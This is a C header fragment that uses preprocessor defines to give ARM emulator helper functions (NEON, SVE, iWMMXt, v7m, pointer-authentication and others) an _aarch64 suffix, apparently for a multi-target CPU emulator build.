#define helper_uhaddsubx helper_uhaddsubx_aarch64
#define helper_usad8 helper_usad8_aarch64
#define helper_sel_flags helper_sel_flags_aarch64
#define helper_crc32 helper_crc32_aarch64
#define helper_crc32c helper_crc32c_aarch64
#define fp_exception_el fp_exception_el_aarch64
#define arm_mmu_idx_to_el arm_mmu_idx_to_el_aarch64
#define arm_mmu_idx_el arm_mmu_idx_el_aarch64
#define arm_mmu_idx arm_mmu_idx_aarch64
#define arm_stage1_mmu_idx arm_stage1_mmu_idx_aarch64
#define arm_rebuild_hflags arm_rebuild_hflags_aarch64
#define helper_rebuild_hflags_m32_newel helper_rebuild_hflags_m32_newel_aarch64
#define helper_rebuild_hflags_m32 helper_rebuild_hflags_m32_aarch64
#define helper_rebuild_hflags_a32_newel helper_rebuild_hflags_a32_newel_aarch64
#define helper_rebuild_hflags_a32 helper_rebuild_hflags_a32_aarch64
#define helper_rebuild_hflags_a64 helper_rebuild_hflags_a64_aarch64
#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64
#define aarch64_sve_narrow_vq aarch64_sve_narrow_vq_aarch64
#define aarch64_sve_change_el aarch64_sve_change_el_aarch64
#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64
#define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64
#define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64
#define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64
#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64
#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64
#define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64
#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64
#define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64
#define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64
#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64
#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64
#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64
#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64
#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64
#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64
#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64
#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64
#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64
#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64
#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64
#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64
#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64
#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64
#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_aarch64
#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64
#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64
#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64
#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64
#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64
#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64
#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64
#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64
#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64
#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64
#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64
#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_aarch64
#define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64
#define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64
#define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64
#define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64
#define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64
#define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64
#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64
#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64
#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64
#define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64
#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64
#define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64
#define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64
#define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64
#define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64
#define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64
#define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64
#define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64
#define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64
#define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64
#define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64
#define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64
#define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64
#define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64
#define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64
#define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64
#define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64
#define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64
#define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64
#define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64
#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64
#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64
#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64
#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64
#define helper_iwmmxt_align helper_iwmmxt_align_aarch64
#define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64
#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64
#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64
#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64
#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64
#define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64
#define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64
#define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64
#define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64
#define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64
#define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64
#define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64
#define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64
#define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64
#define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64
#define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64
#define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64
#define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64
#define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64
#define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64
#define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64
#define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64
#define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64
#define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64
#define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64
#define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64
#define helper_iwmmxt_packuq helper_iwmmxt_packuq_aarch64
#define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64
#define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64
#define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64
#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64
#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64
#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64
#define armv7m_nvic_set_pending armv7m_nvic_set_pending_aarch64
#define helper_v7m_preserve_fp_state helper_v7m_preserve_fp_state_aarch64
#define write_v7m_exception write_v7m_exception_aarch64
#define helper_v7m_bxns helper_v7m_bxns_aarch64
#define helper_v7m_blxns helper_v7m_blxns_aarch64
#define armv7m_nvic_neg_prio_requested armv7m_nvic_neg_prio_requested_aarch64
#define helper_v7m_vlstm helper_v7m_vlstm_aarch64
#define helper_v7m_vlldm helper_v7m_vlldm_aarch64
#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64
#define helper_v7m_mrs helper_v7m_mrs_aarch64
#define helper_v7m_msr helper_v7m_msr_aarch64
#define helper_v7m_tt helper_v7m_tt_aarch64
#define arm_v7m_mmu_idx_all arm_v7m_mmu_idx_all_aarch64
#define arm_v7m_mmu_idx_for_secstate_and_priv arm_v7m_mmu_idx_for_secstate_and_priv_aarch64
#define arm_v7m_mmu_idx_for_secstate arm_v7m_mmu_idx_for_secstate_aarch64
#define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64
#define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64
#define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64
#define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64
#define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64
#define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64
#define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64
#define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64
#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64
#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64
#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64
#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64
#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64
#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64
#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64
#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64
#define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64
#define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64
#define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64
#define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64
#define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64
#define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64
#define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64
#define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64
#define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64
#define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64
#define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64
#define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64
#define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64
#define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64
#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64
#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64
#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64
#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64
#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64
#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64
#define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64
#define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64
#define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64
#define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64
#define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64
#define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64
#define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64
#define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64
#define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64
#define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64
#define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64
#define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64
#define helper_neon_cge_s8 helper_neon_cge_s8_aarch64
#define helper_neon_cge_u8 helper_neon_cge_u8_aarch64
#define helper_neon_cge_s16 helper_neon_cge_s16_aarch64
#define helper_neon_cge_u16 helper_neon_cge_u16_aarch64
#define helper_neon_cge_s32 helper_neon_cge_s32_aarch64
#define helper_neon_cge_u32 helper_neon_cge_u32_aarch64
#define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64
#define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64
#define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64
#define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64
#define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64
#define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64
#define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64
#define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64
#define helper_neon_abd_s8 helper_neon_abd_s8_aarch64
#define helper_neon_abd_u8 helper_neon_abd_u8_aarch64
#define helper_neon_abd_s16 helper_neon_abd_s16_aarch64
#define helper_neon_abd_u16 helper_neon_abd_u16_aarch64
#define helper_neon_abd_s32 helper_neon_abd_s32_aarch64
#define helper_neon_abd_u32 helper_neon_abd_u32_aarch64
#define helper_neon_shl_u16 helper_neon_shl_u16_aarch64
#define helper_neon_shl_s16 helper_neon_shl_s16_aarch64
#define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64
#define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64
#define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64
#define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64
#define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64
#define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64
#define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64
#define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64
#define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64
#define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64
#define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64
#define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64
#define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64
#define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64
#define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64
#define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64
#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64
#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64
#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64
#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64
#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64
#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64
#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64
#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64
#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64
#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_aarch64
#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64
#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64
#define helper_neon_add_u8 helper_neon_add_u8_aarch64
#define helper_neon_add_u16 helper_neon_add_u16_aarch64
#define helper_neon_padd_u8 helper_neon_padd_u8_aarch64
#define helper_neon_padd_u16 helper_neon_padd_u16_aarch64
#define helper_neon_sub_u8 helper_neon_sub_u8_aarch64
#define helper_neon_sub_u16 helper_neon_sub_u16_aarch64
#define helper_neon_mul_u8 helper_neon_mul_u8_aarch64
#define helper_neon_mul_u16 helper_neon_mul_u16_aarch64
#define helper_neon_tst_u8 helper_neon_tst_u8_aarch64
#define helper_neon_tst_u16 helper_neon_tst_u16_aarch64
#define helper_neon_tst_u32 helper_neon_tst_u32_aarch64
#define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64
#define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64
#define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64
#define helper_neon_clz_u8 helper_neon_clz_u8_aarch64
#define helper_neon_clz_u16 helper_neon_clz_u16_aarch64
#define helper_neon_cls_s8 helper_neon_cls_s8_aarch64
#define helper_neon_cls_s16 helper_neon_cls_s16_aarch64
#define helper_neon_cls_s32 helper_neon_cls_s32_aarch64
#define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64
#define helper_neon_rbit_u8 helper_neon_rbit_u8_aarch64
#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64
#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64
#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64
#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64
#define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64
#define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64
#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64
#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64
#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64
#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64
#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64
#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64
#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64
#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64
#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64
#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64
#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64
#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64
#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64
#define helper_neon_widen_u8 helper_neon_widen_u8_aarch64
#define helper_neon_widen_s8 helper_neon_widen_s8_aarch64
#define helper_neon_widen_u16 helper_neon_widen_u16_aarch64
#define helper_neon_widen_s16 helper_neon_widen_s16_aarch64
#define helper_neon_addl_u16 helper_neon_addl_u16_aarch64
#define helper_neon_addl_u32 helper_neon_addl_u32_aarch64
#define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64
#define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64
#define helper_neon_subl_u16 helper_neon_subl_u16_aarch64
#define helper_neon_subl_u32 helper_neon_subl_u32_aarch64
#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64
#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64
#define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64
#define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64
#define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64
#define helper_neon_abdl_s32 helper_neon_abdl_s32_aarch64
#define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64
#define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64
#define helper_neon_mull_u8 helper_neon_mull_u8_aarch64
#define helper_neon_mull_s8 helper_neon_mull_s8_aarch64
#define helper_neon_mull_u16 helper_neon_mull_u16_aarch64
#define helper_neon_mull_s16 helper_neon_mull_s16_aarch64
#define helper_neon_negl_u16 helper_neon_negl_u16_aarch64
#define helper_neon_negl_u32 helper_neon_negl_u32_aarch64
#define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64
#define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64
#define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64
#define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64
#define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64
#define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64
#define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64
#define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64
#define helper_neon_abd_f32 helper_neon_abd_f32_aarch64
#define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64
#define helper_neon_cge_f32 helper_neon_cge_f32_aarch64
#define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64
#define helper_neon_acge_f32 helper_neon_acge_f32_aarch64
#define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64
#define helper_neon_acge_f64 helper_neon_acge_f64_aarch64
#define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64
#define helper_neon_qunzip8 helper_neon_qunzip8_aarch64
#define helper_neon_qunzip16 helper_neon_qunzip16_aarch64
#define helper_neon_qunzip32 helper_neon_qunzip32_aarch64
#define helper_neon_unzip8 helper_neon_unzip8_aarch64
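/*
 * The rename stays consistent across declarations, definitions, and call
 * sites only because every aarch64 translation unit sees this header
 * before any of those symbols.  Illustrative sketch (the prototype below
 * is assumed, not taken from this file):
 *
 *     uint32_t helper_neon_add_u8(uint32_t a, uint32_t b);
 *     // is compiled as:
 *     uint32_t helper_neon_add_u8_aarch64(uint32_t a, uint32_t b);
 */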
#define helper_neon_unzip16 helper_neon_unzip16_aarch64
#define helper_neon_qzip8 helper_neon_qzip8_aarch64
#define helper_neon_qzip16 helper_neon_qzip16_aarch64
#define helper_neon_qzip32 helper_neon_qzip32_aarch64
#define helper_neon_zip8 helper_neon_zip8_aarch64
#define helper_neon_zip16 helper_neon_zip16_aarch64
#define raise_exception raise_exception_aarch64
#define raise_exception_ra raise_exception_ra_aarch64
#define helper_neon_tbl helper_neon_tbl_aarch64
#define helper_v8m_stackcheck helper_v8m_stackcheck_aarch64
#define helper_add_setq helper_add_setq_aarch64
#define helper_add_saturate helper_add_saturate_aarch64
#define helper_sub_saturate helper_sub_saturate_aarch64
#define helper_add_usaturate helper_add_usaturate_aarch64
#define helper_sub_usaturate helper_sub_usaturate_aarch64
#define helper_ssat helper_ssat_aarch64
#define helper_ssat16 helper_ssat16_aarch64
#define helper_usat helper_usat_aarch64
#define helper_usat16 helper_usat16_aarch64
#define helper_setend helper_setend_aarch64
#define helper_wfi helper_wfi_aarch64
#define helper_wfe helper_wfe_aarch64
#define helper_yield helper_yield_aarch64
#define helper_exception_internal helper_exception_internal_aarch64
#define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64
#define helper_exception_bkpt_insn helper_exception_bkpt_insn_aarch64
#define helper_cpsr_read helper_cpsr_read_aarch64
#define helper_cpsr_write helper_cpsr_write_aarch64
#define helper_cpsr_write_eret helper_cpsr_write_eret_aarch64
#define helper_get_user_reg helper_get_user_reg_aarch64
#define helper_set_user_reg helper_set_user_reg_aarch64
#define helper_set_r13_banked helper_set_r13_banked_aarch64
#define helper_get_r13_banked helper_get_r13_banked_aarch64
#define helper_msr_banked helper_msr_banked_aarch64
#define helper_mrs_banked helper_mrs_banked_aarch64
#define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64
#define helper_set_cp_reg helper_set_cp_reg_aarch64
#define helper_get_cp_reg helper_get_cp_reg_aarch64
#define helper_set_cp_reg64 helper_set_cp_reg64_aarch64
#define helper_get_cp_reg64 helper_get_cp_reg64_aarch64
#define helper_pre_hvc helper_pre_hvc_aarch64
#define helper_pre_smc helper_pre_smc_aarch64
#define helper_shl_cc helper_shl_cc_aarch64
#define helper_shr_cc helper_shr_cc_aarch64
#define helper_sar_cc helper_sar_cc_aarch64
#define helper_ror_cc helper_ror_cc_aarch64
#define helper_pacia helper_pacia_aarch64
#define helper_pacib helper_pacib_aarch64
#define helper_pacda helper_pacda_aarch64
#define helper_pacdb helper_pacdb_aarch64
#define helper_pacga helper_pacga_aarch64
#define helper_autia helper_autia_aarch64
#define helper_autib helper_autib_aarch64
#define helper_autda helper_autda_aarch64
#define helper_autdb helper_autdb_aarch64
#define helper_xpaci helper_xpaci_aarch64
#define helper_xpacd helper_xpacd_aarch64
#define arm_is_psci_call arm_is_psci_call_aarch64
#define arm_handle_psci_call arm_handle_psci_call_aarch64
#define helper_sve_predtest1 helper_sve_predtest1_aarch64
#define helper_sve_predtest helper_sve_predtest_aarch64
#define helper_sve_and_pppp helper_sve_and_pppp_aarch64
#define helper_sve_bic_pppp helper_sve_bic_pppp_aarch64
#define helper_sve_eor_pppp helper_sve_eor_pppp_aarch64
#define helper_sve_sel_pppp helper_sve_sel_pppp_aarch64
#define helper_sve_orr_pppp helper_sve_orr_pppp_aarch64
#define helper_sve_orn_pppp helper_sve_orn_pppp_aarch64
#define helper_sve_nor_pppp helper_sve_nor_pppp_aarch64
#define helper_sve_nand_pppp helper_sve_nand_pppp_aarch64
#define helper_sve_and_zpzz_b helper_sve_and_zpzz_b_aarch64
#define helper_sve_and_zpzz_h helper_sve_and_zpzz_h_aarch64
#define helper_sve_and_zpzz_s helper_sve_and_zpzz_s_aarch64
#define helper_sve_and_zpzz_d helper_sve_and_zpzz_d_aarch64
#define helper_sve_orr_zpzz_b helper_sve_orr_zpzz_b_aarch64
#define helper_sve_orr_zpzz_h helper_sve_orr_zpzz_h_aarch64
#define helper_sve_orr_zpzz_s helper_sve_orr_zpzz_s_aarch64
#define helper_sve_orr_zpzz_d helper_sve_orr_zpzz_d_aarch64
#define helper_sve_eor_zpzz_b helper_sve_eor_zpzz_b_aarch64
#define helper_sve_eor_zpzz_h helper_sve_eor_zpzz_h_aarch64
#define helper_sve_eor_zpzz_s helper_sve_eor_zpzz_s_aarch64
#define helper_sve_eor_zpzz_d helper_sve_eor_zpzz_d_aarch64
#define helper_sve_bic_zpzz_b helper_sve_bic_zpzz_b_aarch64
#define helper_sve_bic_zpzz_h helper_sve_bic_zpzz_h_aarch64
#define helper_sve_bic_zpzz_s helper_sve_bic_zpzz_s_aarch64
#define helper_sve_bic_zpzz_d helper_sve_bic_zpzz_d_aarch64
#define helper_sve_add_zpzz_b helper_sve_add_zpzz_b_aarch64
#define helper_sve_add_zpzz_h helper_sve_add_zpzz_h_aarch64
#define helper_sve_add_zpzz_s helper_sve_add_zpzz_s_aarch64
#define helper_sve_add_zpzz_d helper_sve_add_zpzz_d_aarch64
#define helper_sve_sub_zpzz_b helper_sve_sub_zpzz_b_aarch64
#define helper_sve_sub_zpzz_h helper_sve_sub_zpzz_h_aarch64
#define helper_sve_sub_zpzz_s helper_sve_sub_zpzz_s_aarch64
#define helper_sve_sub_zpzz_d helper_sve_sub_zpzz_d_aarch64
#define helper_sve_smax_zpzz_b helper_sve_smax_zpzz_b_aarch64
#define helper_sve_smax_zpzz_h helper_sve_smax_zpzz_h_aarch64
#define helper_sve_smax_zpzz_s helper_sve_smax_zpzz_s_aarch64
#define helper_sve_smax_zpzz_d helper_sve_smax_zpzz_d_aarch64
#define helper_sve_umax_zpzz_b helper_sve_umax_zpzz_b_aarch64
#define helper_sve_umax_zpzz_h helper_sve_umax_zpzz_h_aarch64
#define helper_sve_umax_zpzz_s helper_sve_umax_zpzz_s_aarch64
#define helper_sve_umax_zpzz_d helper_sve_umax_zpzz_d_aarch64
#define helper_sve_smin_zpzz_b helper_sve_smin_zpzz_b_aarch64
#define helper_sve_smin_zpzz_h helper_sve_smin_zpzz_h_aarch64
#define helper_sve_smin_zpzz_s helper_sve_smin_zpzz_s_aarch64
#define helper_sve_smin_zpzz_d helper_sve_smin_zpzz_d_aarch64
#define helper_sve_umin_zpzz_b helper_sve_umin_zpzz_b_aarch64
#define helper_sve_umin_zpzz_h helper_sve_umin_zpzz_h_aarch64
#define helper_sve_umin_zpzz_s helper_sve_umin_zpzz_s_aarch64
#define helper_sve_umin_zpzz_d helper_sve_umin_zpzz_d_aarch64
#define helper_sve_sabd_zpzz_b helper_sve_sabd_zpzz_b_aarch64
#define helper_sve_sabd_zpzz_h helper_sve_sabd_zpzz_h_aarch64
#define helper_sve_sabd_zpzz_s helper_sve_sabd_zpzz_s_aarch64
#define helper_sve_sabd_zpzz_d helper_sve_sabd_zpzz_d_aarch64
#define helper_sve_uabd_zpzz_b helper_sve_uabd_zpzz_b_aarch64
#define helper_sve_uabd_zpzz_h helper_sve_uabd_zpzz_h_aarch64
#define helper_sve_uabd_zpzz_s helper_sve_uabd_zpzz_s_aarch64
#define helper_sve_uabd_zpzz_d helper_sve_uabd_zpzz_d_aarch64
#define helper_sve_mul_zpzz_b helper_sve_mul_zpzz_b_aarch64
#define helper_sve_mul_zpzz_h helper_sve_mul_zpzz_h_aarch64
#define helper_sve_mul_zpzz_s helper_sve_mul_zpzz_s_aarch64
#define helper_sve_mul_zpzz_d helper_sve_mul_zpzz_d_aarch64
#define helper_sve_smulh_zpzz_b helper_sve_smulh_zpzz_b_aarch64
#define helper_sve_smulh_zpzz_h helper_sve_smulh_zpzz_h_aarch64
#define helper_sve_smulh_zpzz_s helper_sve_smulh_zpzz_s_aarch64
#define helper_sve_smulh_zpzz_d helper_sve_smulh_zpzz_d_aarch64
